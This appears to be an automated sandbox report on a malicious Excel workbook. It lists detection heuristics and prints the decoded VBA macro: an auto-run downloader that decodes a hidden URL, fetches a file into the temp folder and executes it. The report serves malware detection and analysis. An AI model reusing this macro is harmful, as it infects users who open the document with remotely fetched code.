MALICIOUS
296
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Donoff-6700491-0. Critical heuristics indicate the presence of VBA macros that utilize URLDownloadToFile and ShellExecute APIs. The Workbook_Open event is also present, suggesting automatic execution upon opening. The primary function of the VBA script appears to be downloading and executing a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Donoff-6700491-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function otqBETpqzJEixQkDynScdbgQJQvIHX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As Long, ByVal SrlDAXtRKGRjxSGQojLNuO As String, ByVal TcRxGGFKhovZnmCFIAYohQzBVy As String, ByVal DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz As Long, ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
fVkuddPCeAMbIZLPpebUnkHdB = Environ$("tmp") & "\" & PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x06 bytes found
Disassembly
Attempted x86 opcode disassembly0000CE7A 06 push es 0000CE7B 06 push es 0000CE7C 06 push es 0000CE7D 06 push es 0000CE7E 06 push es 0000CE7F 06 push es 0000CE80 06 push es 0000CE81 06 push es 0000CE82 06 push es 0000CE83 06 push es 0000CE84 06 push es 0000CE85 06 push es 0000CE86 06 push es 0000CE87 06 push es 0000CE88 06 push es 0000CE89 06 push es 0000CE8A 06 push es 0000CE8B 06 push es 0000CE8C 06 push es 0000CE8D 06 push es 0000CE8E 06 push es 0000CE8F 06 push es 0000CE90 06 push es 0000CE91 06 push es 0000CE92 06 push es 0000CE93 06 push es 0000CE94 06 push es 0000CE95 06 push es 0000CE96 06 push es 0000CE97 06 push es 0000CE98 06 push es 0000CE99 06 push es 0000CE9A 06 push es 0000CE9B 06 push es 0000CE9C 06 push es 0000CE9D 06 push es 0000CE9E 06 push es 0000CE9F 06 push es 0000CEA0 06 push es 0000CEA1 06 push es 0000CEA2 06 push es 0000CEA3 06 push es 0000CEA4 06 push es 0000CEA5 06 push es 0000CEA6 06 push es 0000CEA7 06 push es 0000CEA8 06 push es 0000CEA9 06 push es 0000CEAA 06 push es 0000CEAB 06 push es 0000CEAC 06 push es 0000CEAD 06 push es 0000CEAE 06 push es 0000CEAF 06 push es 0000CEB0 06 push es 0000CEB1 06 push es 0000CEB2 06 push es 0000CEB3 06 push es 0000CEB4 06 push es 0000CEB5 06 push es 0000CEB6 06 push es 0000CEB7 06 push es 0000CEB8 06 push es 0000CEB9 06 push es 0000CEBA 06 push es 0000CEBB 06 push es 0000CEBC 06 push es 0000CEBD 06 push es 0000CEBE 06 push es 0000CEBF 06 push es 0000CEC0 06 push es 0000CEC1 06 push es 0000CEC2 06 push es 0000CEC3 06 push es 0000CEC4 06 push es 0000CEC5 06 push es 0000CEC6 06 push es 0000CEC7 06 push es 0000CEC8 06 push es 0000CEC9 06 push es 0000CECA 06 push es 0000CECB 06 push es 0000CECC 06 push es 0000CECD 06 push es 0000CECE 06 push es 0000CECF 06 push es 0000CED0 06 push es 0000CED1 06 push es 0000CED2 06 push es 0000CED3 06 push es 0000CED4 06 push es 0000CED5 06 push es 0000CED6 06 push es 0000CED7 06 push es 0000CED8 06 push es 0000CED9 06 push es
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9032 bytes |
SHA-256: 9fec7e18202f1e7593adae843859f2b7ed284742dd3fc456244eb53c38f5adde |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub szz()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Macro Name: HDPShCENXRvLeyRLBhqqpufXfJVVmpskI
Private Declare PtrSafe Function WGRXTfwxSTeBiLcHOipfKFGEJvovZAmBFIzYBhQMBVLC Lib "shell32.dll" Alias "ShellExecuteA" (ByVal eMMzzbjwXsWvMYNKEWTqZlrnyP As Long, ByVal QmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgU As String, ByVal pfVkuddPCeAMbIZLPpebUnkHdBHDPS As String, ByVal hCENXRvLeyRLBhqqpufXfJVVmpskIX As String, ByVal QAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQ As String, ByVal ojLNuOTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSg As Long) As Long
Private Declare PtrSafe Function otqBETpqzJEixQkDynScdbgQJQvIHX Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As Long, ByVal SrlDAXtRKGRjxSGQojLNuO As String, ByVal TcRxGGFKhovZnmCFIAYohQzBVy As String, ByVal DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz As Long, ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long) As Long
Private Function LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
Dim LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF, KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH, txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB = StrReverse(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
For KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH = 1 To Len(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB)
LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF = Mid(PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB, KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH, 1)
txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP = txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP & Chr(Asc(LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF) - 1)
Next
LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn = txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
End Function
Private Sub SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ()
Dim bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI As Integer
bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI = 504
Dim qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX As Integer
qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX = 100
If bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI + qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX = 604 Then
HDPShCENXRvLeyRLBhqqpufXfJVVmpskI
End If
End Sub
Private Sub HDPShCENXRvLeyRLBhqqpufXfJVVmpskI()
Dim cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny As String, PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp As String, fVkuddPCeAMbIZLPpebUnkHdB As String, XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu As String, OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH As String, BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI As String
PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp = LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn("fyf/ojxutpidq")
fVkuddPCeAMbIZLPpebUnkHdB = Environ$("tmp") & "\" & PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny = LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn("fyf/tzt{vt0nfutzt.qx0vb/npd/fdbqtfmzutzujdejn00;quui")
otqBETpqzJEixQkDynScdbgQJQvIHX 0, cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny, fVkuddPCeAMbIZLPpebUnkHdB, 0, 0
WGRXTfwxSTeBiLcHOipfKFGEJvovZAmBFIzYBhQMBVLC 0, "open", fVkuddPCeAMbIZLPpebUnkHdB, "", vbNullString, vbNormalFocus
End Sub
Private Sub Workbook_Open()
Range("A1").Value = ""
SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/4e3700cb36314bbe8867065296cac3e2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 4689 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Macro Name: HDPShCENXRvLeyRLBhqqpufXfJVVmpskI"
' Line #1:
' FuncDefn (Private Declare PtrSafe Function hCENXRvLeyRLBhqqpufXfJVVmpskIX Lib "TcRxGGFKhovZnmCFIAYohQzBVy" (ByVal QAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQ As Long, ByVal ojLNuOTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSg As String, ByVal shell32.dll As String, ByVal otqBETpqzJEixQkDynScdbgQJQvIHX As String, ByVal ceVvKCnUWrTYnxRfSEgCBdKcOSs As String, ByVal SrlDAXtRKGRjxSGQojLNuO As Long) As Long)
' Line #2:
' FuncDefn (Private Declare PtrSafe Function DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz Lib "LuuhTuQesYqdhGusmEBXuSYUgjyTUfojMcvPidSyGHF" (ByVal deKRksiNIJHMyELcDCSILCcEkiPEYOFT As Long, ByVal urlmon As String, ByVal LCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrn As String, ByVal PhiDENmSwLsyRZPvqrpufYgJlVmqskJmQBxlGwnB As Long, ByVal Workbook As Long) As Long)
' Line #3:
' FuncDefn (Private Function KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH(txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP, id_FFFE As Variant))
' Line #4:
' Dim
' VarDefn Chr
' VarDefn Asc
' VarDefn SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Line #5:
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' ArgsLd bYeOVdtTTkZcTtVAygUpgWkvedQQsAMpIoMeqecVolHrCI 0x0001
' St txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' Line #6:
' StartForVariable
' Ld Asc
' EndForVariable
' LitDI2 0x0001
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' FnLen
' For
' Line #7:
' Ld txWxICURoKjbWjAOkXhEzdfLgltjOXXVbyFMrDDSWZRqFyiP
' Ld Asc
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St Chr
' Line #8:
' Ld SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Ld Chr
' ArgsLd HDPShCENXRvLeyRLBhqqpufXfJVVmpskI 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd qCSTprAXFiyflEMBhddchRKRwWIdhkcAeIsodxnesCllX 0x0001
' Concat
' St SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' Line #9:
' StartForVariable
' Next
' Line #10:
' Ld SnPTifNbAAckwYsXvNnNYSlUrbmrozQfnoxVPtvciBJzfZ
' St KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Private Sub cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny())
' Line #13:
' Dim
' VarDefn PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp (As Integer)
' Line #14:
' LitDI2 0x01F8
' St PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
' Line #15:
' Dim
' VarDefn fVkuddPCeAMbIZLPpebUnkHdB (As Integer)
' Line #16:
' LitDI2 0x0064
' St fVkuddPCeAMbIZLPpebUnkHdB
' Line #17:
' Ld PQmoxUBfvciBJyeZZXdOHOtTFUYcTsVAkgUp
' Ld fVkuddPCeAMbIZLPpebUnkHdB
' Add
' LitDI2 0x025C
' Eq
' IfBlock
' Line #18:
' ArgsCall XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu 0x0000
' Line #19:
' EndIfBlock
' Line #20:
' EndSub
' Line #21:
' FuncDefn (Private Sub XQAilFimAKgtgSuQOrYqcgFgrlDAXtRKGRjxSGQojLNu())
' Line #22:
' Dim
' VarDefn OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH (As String)
' VarDefn BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI (As String)
' VarDefn Environ (As String)
' VarDefn vbNullString (As String)
' VarDefn vbNormalFocus (As String)
' VarDefn Workbook_Open (As String)
' Line #23:
' LitStr 0x000D "fyf/ojxutpidq"
' ArgsLd KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH 0x0001
' St BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI
' Line #24:
' LitStr 0x0003 "tmp"
' ArgsLd Range$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld BTDZJUbWizNVWhEzdeKRksiNIJHMyELcDCSI
' Concat
' St Environ
' Line #25:
' LitStr 0x0034 "fyf/tzt{vt0nfutzt.qx0vb/npd/fdbqtfmzutzujdejn00;quui"
' ArgsLd KwpwZnmCGJAZpiRzCWzDRcwKxkKhgIqH 0x0001
' St OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH
' Line #26:
' LitDI2 0x0000
' Ld OTcRxGGFKhovZnmCFIAYohQzBVyDQNwJjjKSgHbGfwWwH
' Ld Environ
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall DQNwJjjKSgHbGfwWwHBTDZJUbWizNVWhEz 0x0005
' Line #27:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Environ
' LitStr 0x0000 ""
' Ld Value
' Ld Worksheet
' ArgsCall hCENXRvLeyRLBhqqpufXfJVVmpskIX 0x0006
' Line #28:
' EndSub
' Line #29:
' FuncDefn (Private Sub id_0278())
' Line #30:
' LitStr 0x0000 ""
' LitStr 0x0002 "A1"
' ArgsLd id_027A 0x0001
' MemSt id_027C
' Line #31:
' ArgsCall cDCSILCcEkiPEYOFTeMMzzbjwXsWvMYNKEWTqZlrny 0x0000
' Line #32:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.